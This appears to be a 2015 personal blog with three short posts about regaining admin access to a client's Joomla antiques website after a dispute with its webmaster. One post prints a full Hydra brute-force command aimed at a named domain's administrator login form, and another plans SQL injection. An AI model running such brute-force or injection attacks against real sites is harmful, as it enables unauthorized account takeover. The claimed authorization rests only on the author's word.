Widespread Augmented Reality

Widespread Augmented Reality
Click on the image to get the Android Augmented Reality Heads up Display

Monday, August 17, 2015

Authorized Brute Force Password Attack from 104.175.53.76

Since I have been authorized to pentest Design-atelier-antiques, I installed and ran Hydra on Ubuntu Linux. Below is an example of what I typed into the command line window.

hydra -l adminv01 -P pwlist3.txt -s 80 -f www.designer-atelier-antiques.com http-post-form "antiques/administrator/index.php?page=login.php:usrname=^USER^&pass=^PASS^&login-php-submit-button=Login:Incorrect Username"

Sunday, August 9, 2015

Shady Blackmailing Web Master

The creator of Design-Atelier-Antiques is claiming that the stakeholder owes for domain renewal payments that he has been making on their behalf. The stakeholder claims that this web master cost them $4000.00. I was astonished by this amount but even more so by the web master withholding Joomla administration access. A scan of this URL should reveal the web master name.

Meanwhile, I've continued to explore ways of regaining control via the following:

Tuesday, August 4, 2015

Permission to Hack a Site

With the disappearance of the original webmaster and having received permission to hack my client's site, I spidered the URL with Screaming Frog's SEO Spider. After reviewing the results, I determined that the Joomla site had its administrator page here. Now the fun begins with guessing the password, testing for SQL injection and brute forcing a login. Stay tuned.